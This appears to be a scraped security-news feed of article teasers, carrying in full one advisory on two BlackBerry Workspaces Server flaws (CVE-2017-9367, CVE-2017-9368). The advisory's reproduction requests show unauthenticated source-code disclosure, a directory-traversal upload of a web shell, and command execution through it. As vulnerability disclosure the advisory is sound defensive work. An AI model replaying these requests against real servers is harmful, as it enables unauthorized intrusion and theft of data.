Year in Review: How Did the Cyberthreat Landscape Change in 2017?

Over the course of 2017, the cyberthreat landscape shifted to accommodate a sharper focus on pure data destruction for the sake of disruption rather than monetary gain.

The post Year in Review: How Did the Cyberthreat Landscape Change in 2017? appeared first on Security Intelligence.

Continue reading Year in Review: How Did the Cyberthreat Landscape Change in 2017?

What Can We Learn From the ‘Global State of Information Security Survey 2018’?

While PwC’s “Global State of Information Security Survey” noted that governments have improved cyber resilience, businesses still have a long way to go.

The post What Can We Learn From the ‘Global State of Information Security Survey 2018’? appeared first on Security Intelligence.

Continue reading What Can We Learn From the ‘Global State of Information Security Survey 2018’?

Remote Code Execution in BlackBerry Workspaces Server

Overview

Gotham Digital Science (GDS) has discovered a vulnerability affecting BlackBerry Workspaces Server (formerly WatchDox). Prior to being patched, it was possible to remotely execute arbitrary code by exploiting insecure file upload functionality as an unauthenticated user. Additionally, source code disclosure was possible by issuing an HTTP request for a Node.js file inside of the server’s webroot.

CVE-2017-9367 and CVE-2017-9368 were discovered by Eric Rafaloff during a client engagement conducted by Gotham Digital Science.

BlackBerry’s security advisory regarding these vulnerabilities is available here: BSRT-2017-006

Vulnerable Versions

The following Workspaces Server components are known to be vulnerable:

  • Appliance-X versions 1.11.2 and earlier
  • vApp versions 5.6.0 to 5.6.6
  • vApp versions 5.5.9 and earlier

Timeline

  • 5/10/17 – CVE-2017-9367 and CVE-2017-9368 disclosed to BlackBerry.
  • 5/10/17 – BlackBerry acknowledges receiving our report.
  • 5/16/17 – BlackBerry confirms that an investigation has started.
  • 6/6/17 – BlackBerry confirms the reported security vulnerabilities and communicates that they will be issuing two CVEs.
  • 6/28/17 – BlackBerry confirms that development has started on fixes for the two reported vulnerabilities, requests delay of disclosure.
  • 9/6/17 – BlackBerry states that their advisory is expected to be made on September 12th.
  • 9/7/17 – BlackBerry states that their advisory will need to be pushed back until October 10th, requests additional delay of disclosure.
  • 9/13/17 – BlackBerry requests additional delay of disclosure to October 16th.
  • 10/16/17 – GDS and BlackBerry coordinated disclosure.

GDS commends BlackBerry for their diligence and consistent communication during the disclosure process.

Issue Description

The BlackBerry Workspaces Server offers a file server API, with which files can be uploaded and downloaded. GDS found that by making an unauthenticated HTTP GET request for /fileserver/main.js, it was possible to view the file server’s source code (CVE-2017-9368).

Reproduction Request #1

GET /fileserver/main.js HTTP/1.1
Host: [REMOVED BY GDS]

Reproduction Response #1

HTTP/1.1 200 OK
[..snip..]

By analyzing this disclosed source code, GDS located a directory traversal vulnerability affecting the saveDocument endpoint of the file server API. This endpoint did not require authentication, and when exploited allowed GDS to obtain remote code execution by uploading a web shell to the server’s webroot (CVE-2017-9367).

Reproduction Request #2

POST /fileserver/saveDocument HTTP/1.1
[..snip..]
Content-Type: multipart/form-data; boundary=---------------------------1484231460308104668732082159
Content-Length: 1286
 
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uuid"
 
/../../mnt/filespace/0/whiteLabel/
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="fileName"
 
shell.jsp
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="store"
 
local
-----------------------------1484231460308104668732082159
Content-Disposition: form-data; name="uploadFile"; filename="test"
 
[..snip..]
-----------------------------1484231460308104668732082159--

Reproduction Response #2

HTTP/1.1 200 OK
[..snip..]
 
{"success":"true"}

Reproduction Request #3

GET /whiteLabel/shell.jsp?cmd=whoami HTTP/1.1
[..snip..]

Reproduction Response #3

HTTP/1.1 200 OK
[..snip..]
 
<pre>Command was: <b>whoami</b>
 
watchdox
</pre>

Impact

CVE-2017-9368 allows unauthorized disclosure of application source code. This can be exploited by an unauthenticated user to discover additional security vulnerabilities (such as CVE-2017-9367).

CVE-2017-9367 allows an unauthenticated user to upload and run executable code, and as such can be used to compromise the integrity of the entire application and its data. For example, upon exploitation of this vulnerability, GDS was able to read the contents of the Workspace Server’s database and compromise highly sensitive information.

Remediation

GDS recommends that affected users update immediately to a patched version of the product. BlackBerry has confirmed that the following Workspaces Server components are not affected:

  • Appliance-X version 1.12.0 and later
  • Appliance-X version 1.11.3 and later
  • vApp version 5.7.2 and later
  • vApp version 5.6.7 and later
  • vApp version 5.5.10 and later

The post Remote Code Execution in BlackBerry Workspaces Server appeared first on Security Boulevard.

Continue reading Remote Code Execution in BlackBerry Workspaces Server

Weighing the Benefits and Challenges of Cognitive Adoption

While it promises to improve quality of life across the globe, many are resistant to widespread cognitive adoption due to fear of change and other factors.

The post Weighing the Benefits and Challenges of Cognitive Adoption appeared first on Security Intelligence.

Continue reading Weighing the Benefits and Challenges of Cognitive Adoption

Getting Ahead of SD-WAN Security With the Zero Trust Model

According to recent studies, security is the top concern among organizations implementing software-defined wide area network (SD-WAN) technology.

The post Getting Ahead of SD-WAN Security With the Zero Trust Model appeared first on Security Intelligence.

Continue reading Getting Ahead of SD-WAN Security With the Zero Trust Model

Government Agencies Must Work With the Private Sector to Bolster Infrastructure Security

To improve infrastructure security per the president’s executive order, government agencies must build trust with the private security industry.

The post Government Agencies Must Work With the Private Sector to Bolster Infrastructure Security appeared first on Security Intelligence.

Continue reading Government Agencies Must Work With the Private Sector to Bolster Infrastructure Security

Cybercrime Without Borders: Bridging Gaps Between Public and Private Sectors to Ensure a Safer Future

Cybercrime affects businesses and government agencies equally, so why shouldn’t the public and private sectors collaborate to secure their critical assets?

The post Cybercrime Without Borders: Bridging Gaps Between Public and Private Sectors to Ensure a Safer Future appeared first on Security Intelligence.

Continue reading Cybercrime Without Borders: Bridging Gaps Between Public and Private Sectors to Ensure a Safer Future

Who Is Responsible for Cloud Security?

Cloud security must be a team effort between providers and customers. The distribution of responsibility depends on the cloud model.

The post Who Is Responsible for Cloud Security? appeared first on Security Intelligence.

Continue reading Who Is Responsible for Cloud Security?

Big Changes Around the Corner for the IoT

The IoT is transforming before our eyes due to increasing regulations, growing demand for security standards and advancements in the telecom industry.

The post Big Changes Around the Corner for the IoT appeared first on Security Intelligence.

Continue reading Big Changes Around the Corner for the IoT

How to Ensure the Success of a Hot Desking Strategy

A hot desking strategy allows employees to sit wherever they want, creating more flexibility for workers and more complexity for IT managers.

The post How to Ensure the Success of a Hot Desking Strategy appeared first on Security Intelligence.

Continue reading How to Ensure the Success of a Hot Desking Strategy